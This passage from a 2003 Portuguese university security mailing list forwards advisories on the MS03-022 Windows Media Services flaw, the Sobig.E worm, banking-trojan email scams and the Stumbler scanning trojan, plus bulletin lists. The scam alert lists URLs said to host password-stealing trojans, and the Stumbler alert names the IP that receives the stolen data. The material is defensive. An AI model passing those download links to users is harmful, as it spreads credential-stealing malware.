in ISAPI Extension for Windows Media Services Could Cause Code Execution (822343), que trata de uma vulnerabilidade identificada na extensao ISAPI, Internet Services Application Programming Interface, relacionada com o Microsoft Windows Media Services. Esta vulnerabilidade e' diferente da reportada no alerta MS03-019 (817772) de 29 de Maio de 2003. Sistemas Afetados: . Microsoft Windows 2000 Correções disponíveis: A correção consiste na aplicação dos patches recomendados pela Microsoft e disponíveis em: . Microsoft Windows 2000: http://microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en Maiores informações: http://www.microsoft.com/technet/security/bulletin/ms03-022.asp Identificador do CVE: CAN-2003-0349, (http://cve.mitre.org) O CAIS recomenda aos administradores de plataformas Microsoft que mantenham seus sistemas e aplicativos sempre atualizados. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ - - ------------------------------------------------------------------ Title: Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (822343) Date: 25 June 2003 Software: Microsoft(r) Windows(r) 2000 Impact: Allow an attacker to execute code of their choice Max Risk: Important Bulletin: MS03-022 Microsoft encourages customers to review the Security Bulletins at: http://www.microsoft.com/technet/security/bulletin/MS03-022.asp http://www.microsoft.com/security/security_bulletins/ms03-022.asp - - ------------------------------------------------------------------ Issue: ====== Microsoft Windows Media Services is a feature of Microsoft Windows 2000 Server, Advanced Server, and Datacenter Server and is also available in a downloadable version for Windows NT 4.0 Server. Windows Media Services contains support for a method of delivering media content to clients across a network known as multicast streaming. In multicast streaming, the server has no connection to or knowledge of the clients that may be receiving the stream of media content coming from the server. To facilitate logging of client information for the server, Windows 2000 includes a capability specifically designed to enable logging for multicast transmissions. This logging capability is implemented as an Internet Services Application Programming Interface (ISAPI) extension - nsiislog.dll. When Windows Media Services are added through add/remove programs to Windows 2000, nsiislog.dll is installed in the Internet Information Services (IIS) Scripts directory on the server. Once Windows Media Services is installed, nsiislog.dll is automatically loaded and used by IIS. There is a flaw in the way nsiislog.dll processes incoming client requests. A vulnerability exists because an attacker could send specially formed HTTP request (communications) to the server that could cause IIS to fail or execute code on the user's system. Windows Media Services is not installed by default on Windows 2000. An attacker attempting to exploit this vulnerability would have to be aware which computers on the network had Windows Media Services installed on it and send a specific request to that server. Mitigating Factors: ==================== - Windows Media Services 4.1 is not installed by default on Windows 2000. - Windows Media Services are not available for Windows 2000 Professional. Risk Rating: ============ Important Patch Availability: =================== - A patch is available to fix this vulnerability. Please read the Security Bulletins at http://www.microsoft.com/technet/security/bulletin/ms03-022.asp http://www.microsoft.com/security/security_bulletins/ms03-022.asp for information on obtaining this patch. Acknowledgment: =============== - Brett Moore (brett.moore em security-assessment.com) - - ------------------------------------------------------------------ THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. ******************************************************************* You have received this e-mail bulletin because of your subscription to the Microsoft Product Security Notification Service. For more information on this service, please visit http://www.microsoft.com/technet/security/notify.asp. To verify the digital signature on this bulletin, please download our PGP key at http://www.microsoft.com/technet/security/notify.asp. To unsubscribe from the Microsoft Security Notification Service, please visit the Microsoft Profile Center at http://register.microsoft.com/regsys/pic.asp If you do not wish to use Microsoft Passport, you can unsubscribe from the Microsoft Security Notification Service via email as described below: Reply to this message with the word UNSUBSCRIBE in the Subject line. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPvsgx+kli63F4U8VAQHdswP/VYCxBxWwmy7xYwecpCpfALRe4x2nBv6R /yA5EAOD+vvaweEFDp4Sy4rO0aqdLaSIbkNJr0lSsEn5QOHTuC+6+Tixs/fCxXh+ FAnqYaQRQa3TzPINRWeMo9K2B/6SJdgriG+eCBZg4+Ul1BrLX50uLFhnEpBCOzJm 2wjW4HLwAM4= =2Yif -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 27 09:21:25 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 27 Jun 2003 09:21:25 -0300 Subject: [SECURITY-L] MS lanca pacote de atualizacao para Windows 2000 Message-ID: <20030627122125.GI285@ccuec.unicamp.br> ----- Forwarded message from Andre Aparecido Nogueira ----- From: Andre Aparecido Nogueira Subject: MS lança pacote de atualização para Windows 2000 To: undisclosed-recipients: ; Date: Fri, 27 Jun 2003 07:19:19 -0300 *MS lança pacote de atualização para Windows 2000* Quinta-feira, 26 de Junho de 2003 - 15h03 Já está disponível no site da Microsoft o mais recente pacote de atualização para o Windows 2000, o Service Pack 4 (SP4) voltado para as várias versões desse sistema operacional, como o Windows 2000 Windows 2000 Professional, Windows 2000 Server, Windows 2000 Advanced Server, entre outros. Disponível em duas versões, o Full Install (+130 MB) e o Express (600 KB), ele contém todas as atualizações existentes nos pacotes anteriores (SP1, SP2 e SP3), de modo que não é necessário instalá-los antes do SP4. O software está disponível apenas em inglês e alemão, por enquanto. A Microsoft Brasil informa que não há previsão de lançamento do SP4 em português. Além disso, ele contém atualizações para o Microsoft Internet Explorer 5.01 (SP4) e Outlook Express 5.5 (SP2), totalizando em torno de 675 correções no total. O site NeoWin.net publicou nesta quinta-feira (25/06) uma lista detalhada detalhada de todos os problemas resolvidos com o SP4. Clique aqui para obter informações mais detalhadas e fazer o download do pacote no site da Microsoft. [ Mário Nagano ] *Site relacionado:* · www.microsoft.com -- Andre Aparecido Nogueira Faculdade de Eng. Agricola/UNICAMP °v° E-mail: mailto:andre em agr.unicamp.br /(_)\ Seja livre, use Linux! ^ ^ ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 27 15:19:55 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 27 Jun 2003 15:19:55 -0300 Subject: [SECURITY-L] CAIS-Alerta: Propagacao do virus Sobig.E Message-ID: <20030627181954.GC7550@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Propagacao do virus Sobig.E To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Fri, 27 Jun 2003 14:27:27 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, O CAIS tem detectado, desde a noite de 26/06/2003, um aumento significativo na atividade de uma nova variante do virus Sobig, conhecido como Sobig.E. O arquivo que acompanha as mensagens infectadas possui a extensao .zip e tamanho de 86528 bytes. Alguns dos possiveis Subjects: que constam nas mensagens enviadas pelo virus sao: . Re: Application . Re: Movie . Re: Movies . Re: Submitted . Re: Documents Os possiveis nomes dos arquivos anexados as mensagens do virus sao: . your_details.zip . application.zip . movie.zip Maiores informacoes sobre o Sobig.E podem ser encontradas nas URLs abaixo: . http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOBIG.E . http://securityresponse.symantec.com/avcenter/venc/data/w32.sobig.e em mm.html . http://www.viruslist.com/eng/viruslist.html?id=61094 . http://www.f-secure.com/v-descs/sobig_e.shtml A empresa F-Secure desenvolveu um aplicativo para a remocao do virus, disponivel no seguinte endereco: ftp://ftp.f-secure.com/anti-virus/tools/f-sobig.zip O CAIS recomenda fortemente a todos os usuarios que mantenham seus antivírus sempre atualizados, com frequencia diaria ou de forma automatica; nao abram anexos de qualquer especie sem antes analisa´-los com um antivirus, se certificando sempre da autenticidade do endereco de origem do e-mail. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPvx+iekli63F4U8VAQHupwP8DomRE+3ZSB76paYFsDYabniTumW4IkrR auvOVS3K5FeF5cMk66JzCuOwU7yndYk9KlcCX7D9QhI3aQpBPSH9rQJlYoRUYvdp 5V0OTFwign0Yc1lFbjgPkhbQKU5rGso53v3nfhXRk2d8nAXQGu6yaxwcf75Tav0w +vbc0WpZ7Jo= =eOkm -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 27 15:23:42 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 27 Jun 2003 15:23:42 -0300 Subject: [SECURITY-L] CAIS-Alerta: Proliferacao de Golpes por Email Message-ID: <20030627182342.GD7550@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Proliferacao de Golpes por Email To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Fri, 27 Jun 2003 14:56:08 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, Nos ultimos meses, tem se diversificado e proliferado os golpes por email na Internet. Neste contexto, o CAIS tem registrado um aumento no trafego de mensagens com conteudo falso que, embora usem o nome de empresas ou Instituições idoneas, visam induzir o leitor a instalar aplicativos que são na verdade trojans. Alguns exemplos sao: mensagens em busca de participantes para programas televisivos, para concorrer a premios, para atualizar cadastros ou senhas de banco, para corrigir determinada falha de seguranca em algum aplicativo. As mensagens falsas seguem um padrao: . o email de origem e' semelhante a um email de servico de uma certa empresa. Exemplo: supportt em empresa.com . o texto, embora as vezes seja mal escrito, tem o intuito de convencer o usuario de que se trata de um comunicado oficial. . solicitam a instalacao de determinado aplicativo. Tais software ficam hospedados em provedores gratuitos e nao possuem relacao com as empresas, produtos e programas que estao sendo utilizados para enganar o usuario. Na verdade, trata-se de trojans, cuja funcao principal e' roubar e coletar informacoes da vitima, como senhas de Internet Banking por exemplo. Estes aplicativos implementam funcoes de keylogger e screenlogger, usadas para capturar as informacoes desejadas. Algumas das mensagens deste genero identificadas recentemente possuiam os seguintes Subjects: . Big Brother Brasil . Big Brother Brasil 4 . Nao seja invadido HOJE . Aplicativo de seguranca contra invasao . Seguranca - Atualize Sao listados abaixo, alguns dos enderecos usados para hospedar os trojans e citados nas mensagens falsas. . http://netupdates.webcindario.com/ie60sp2.exe . http://www.gratisweb.com/systemasecurity/Instalar.exe . http://www.gratisweb.com/inscricaobig/formulario.exe . http://www.formulariodoconcorrente.hpg.com.br/globo.exe . http://www.softwaredownloads2003.hpg.com.br/Instalar.exe . http://www.securitdoc.hpg.ig.com.br/instalar.exe . http://www.software3003.hpg.com.br/instalar.exe . http://www.intermega.com.br/hardwaredoparticipante/globo.exe . http://www.intermega.com.br/sistemadownloads/Attacker3.0.exe . http://intermega.com.br/softwaredoconcorrente/globo.com.exe Maiores informacoes: . Falso BBB4 serve para roubar senhas bancárias http://www.infoguerra.com.br/infoguerra.php?newsid=1056553985,56169,/ . Laboratório ACME! Computer Security Research https://forum.acmesecurity.org/viewtopic.php?t=360 . Fraudes em Internet Banking http://www.rnp.br/cais/alertas/2003/cais-alr-02042003.html O CAIS recomenda aos usuários especial atenção com as mensagens recebidas contendo promessas milagrosas, concursos, prêmios, bem como solicitacoes de alteracao de cadastro bancario e senhas de acesso. Assim, recomenda-se fortemente a todos os usuarios que mantenham seus antivírus sempre atualizados, com frequencia diaria ou de forma automatica; nao abram anexos de qualquer especie sem antes analisa´-los com um antivirus, se certificando sempre da autenticidade do endereco de origem do e-mail. Em caso de duvida, aconselha-se consultar os sites oficiais da empresa ou Instituição citada na mensagem. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPvyFP+kli63F4U8VAQEb3wP+PtwsFhzP1jbQ/OwhmCGRN6+gzt4ceFRu 6pp1h9SMZvaq3QHcAuvZcdXP7miBjYOYJUYGMh8a6WBfX2+dIMxgzvjIbg1KxAWF maLJBCPiH6txHpJZVeoM613X9DNrTkLLaqm8TRuhcaoFs5cbq2OacJsHKP/kx79o mF+2M6rkI5w= =IVLN -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 27 15:18:27 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 27 Jun 2003 15:18:27 -0300 Subject: [SECURITY-L] CAIS-Alerta: Atividade gerada pelo Stumbler (Trojan 55808) Message-ID: <20030627181827.GB7550@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Atividade gerada pelo Stumbler (Trojan 55808) To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Fri, 27 Jun 2003 14:13:05 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, Nas ultimas semanas o CAIS tem acompanhado varias discussoes relacionadas ao trafego de pacotes TCP com certa caracteristica marcante: o Window Size de tamanho 55808. Os sistemas de monitoramento do CAIS identificaram trafego deste genero, direcionado a porta 21 (FTP). Ate' o momento foram capturadas e analisadas duas versoes do "malware" (ferramenta hacker) que estaria gerando este trafego, batizado de Stumbler e tambem chamado de Trojan 55808. Existem alguns questionamentos se as copias obtidas sao a fonte original dos pacotes ou se foram desenvolvidas para imitar o trafego que comecou a ser detectado durante a segunda semana do mes de Junho. A analise do Stumbler indica que sua funcao e' realizar atividade de reconhecimento (scanning) de forma distribuida, dificultando a identificacao da origem da atividade (stealth scanning), ja' que o endereco IP origem dos pacotes gerados por ele e' forjado. O funcionamento e' melhor descrito a seguir. Os pacotes possuem as seguintes caracteristicas: . Pacotes TCP SYN com Window Size = 55808 . IP origem e IP destino aleatorios . Porta Origem e Porta Destino diversas variados O processo de mapeamento comeca com o envio de pacotes TCP SYN com a porta desejada para as maquinas alvo. Como a origem e' forjada esses pacotes sao capturados em transito por maquinas infectadas com o "Stumbler". A maquina onde esta' instalada o malware coloca a placa de rede em modo promiscuo para poder capturar todos os pacotes e entao identificar quais possuem o Window Size especifico. Essas informacoes sao coletadas, armazenadas e posteriormente enviadas a um IP especifico. O IP destino dos dados coletados nas versoes analisadas e' 12.108.65.76. No entanto este IP pode ser alterado remotamente com o envio de um pacote TCP especialmente construido. As maquinas infectadas com o Stumbler apresentam as seguintes caracteristicas: . presenca do arquivo /tmp/.../a (ccdigo executavel do "Stumbler") . presenca do arquivo /tmp/.../r (dados coletados pelo "Stumbler") Maiores informacoes: "Stumbler" Distributed Stealth Scanning Network . http://xforce.iss.net/xforce/alerts/id/advise146 Intrusec Alert: 55808 Trojan Analysis . http://www.intrusec.com/55808.html Window Size 55808 packets . http://isc.sans.org/diary.html?date=2003-06-22 O CAIS estara' acompanhando a evolucao deste caso, mantendo-os informados sobre novos desdobramentos do mesmo. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPvx7KOkli63F4U8VAQG48AQAtHapJbBIEzopAGUcAByI3dvGy3I8Eskx Te91JaxfPPWar6goc2/D240cDuE7jfi+4cLx0MmfY+0yi8kAIln8c94ED1bkkD+H YxuCipCBkgv1xgC3lEs44ReCdRW/ZLPRUKturcVUwuy6ElArxPNJhY3Z3p8Q0oZt Cyav+WvmV3U= =1EWq -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 27 16:55:32 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 27 Jun 2003 16:55:32 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030627195532.GA7917@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 17/06/2003 ---------- Mandrake Linux Security Update Advisory (MDKSA-2003:069) Assunto: vulnerabilidade de seguranca no pacote BitchX. http://www.security.unicamp.br/docs/bugs/2003/06/v41.txt Debian Security Advisory (DSA 316-3) Assunto: vulnerabilidade de seguranca no pacote jnethack. http://www.security.unicamp.br/docs/bugs/2003/06/v42.txt 18/06/2003: ----------- Debian Security Advisory (DSA 324-3) Assunto: vulnerabilidade de seguranca no pacote ethereal. http://www.security.unicamp.br/docs/bugs/2003/06/v43.txt 19/06/2003: ----------- Debian Security Advisory (DSA 325-1) Assunto: vulnerabilidade de seguranca no pacote eldav. http://www.security.unicamp.br/docs/bugs/2003/06/v44.txt 23/06/2003: ----------- Mandrake Linux Security Update Advisory (MDKSA-2003:070) Assunto: vulnerabilidade de seguranca no pacote ethereal. http://www.security.unicamp.br/docs/bugs/2003/06/v45.txt Debian Security Advisory (DSA 330-1) Assunto: vulnerabilidade de seguranca no pacote tcptraceroute. http://www.security.unicamp.br/docs/bugs/2003/06/v46.txt Symantec Security Check ActiveX Buffer Overflow http://www.security.unicamp.br/docs/bugs/2003/06/v47.txt 24/06/2003: ----------- SGI Security Advisory (20030607-01-P) Assunto: Multiple IPv6-Induced Bugs & Vulnerabilities. http://www.security.unicamp.br/docs/bugs/2003/06/v48.txt 25/06/2003: ----------- Microsoft Security Bulletin (MS03-022) Assunto: Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (822343). http://www.security.unicamp.br/docs/bugs/2003/06/v49.txt Microsoft Security Bulletin (MS03-021) Assunto: Flaw In Windows Media Player May Allow Media Library Access (819639). http://www.security.unicamp.br/docs/bugs/2003/06/v50.txt Anúncio de Segurança do Conectiva Linux (CLA-2003:662) Assunto: diversas vulnerabilidades no pacote ethereal. http://www.security.unicamp.br/docs/bugs/2003/06/v51.txt 26/06/2003: ----------- CAIS-Alerta Assunto: Vulnerabilidade no Windows Media Player 9 (819639). http://www.security.unicamp.br/docs/bugs/2003/06/v52.txt CAIS-Alerta Assunto: Vulnerabilidade no ISAPI Extension do Windows Media Services (822343). http://www.security.unicamp.br/docs/bugs/2003/06/v53.txt 27/06/2003: ----------- Anúncio de atualização do Conectiva Linux (CLA-2003:663) Assunto: Problema com atualização a partir do CL8 no pacote alsa. http://www.security.unicamp.br/docs/bugs/2003/06/v54.txt Anúncio de Segurança do Conectiva Linux (CLA-2003:664) Assunto: Vulnerabilidade de estouro de buffer no pacote radiusd-cistron. http://www.security.unicamp.br/docs/bugs/2003/06/v55.txt CAIS-Alerta Assunto: Atividade gerada pelo Stumbler (Trojan 55808). http://www.security.unicamp.br/docs/bugs/2003/06/v56.txt CAIS-Alerta Assunto: Propagacao do virus Sobig.E http://www.security.unicamp.br/docs/bugs/2003/06/v57.txt CAIS-Alerta Assunto: Proliferacao de Golpes por Email. http://www.security.unicamp.br/docs/bugs/2003/06/v58.txt Anúncio de Segurança do Conectiva Linux (CLA-2003:665) Assunto: vulnerabilidade de seguranca no pacote kopete. http://www.security.unicamp.br/docs/bugs/2003/06/v59.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Fri Jun 27 15:46:45 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 27 Jun 2003 15:46:45 -0300 Subject: [SECURITY-L] Boletins de noticias Message-ID: <20030627184645.GA7773@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticia e/ou revistas eletronicas: 18/06/2003: ----------- SANS NewsBites Vol. 5 Num. 24 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b11.txt 23/06/2003 ---------- SANS Critical Vulnerability Analysis Vol 2 No 24 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b12.txt SecurityFocus Newsletter #202 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2003/06/b13.txt 24/06/2003 ---------- Módulo Security News no. 298 Fonte: Módulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2003/06/b15.txt 25/06/2003 ---------- SANS NewsBites Vol. 5 Num. 25 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b14.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br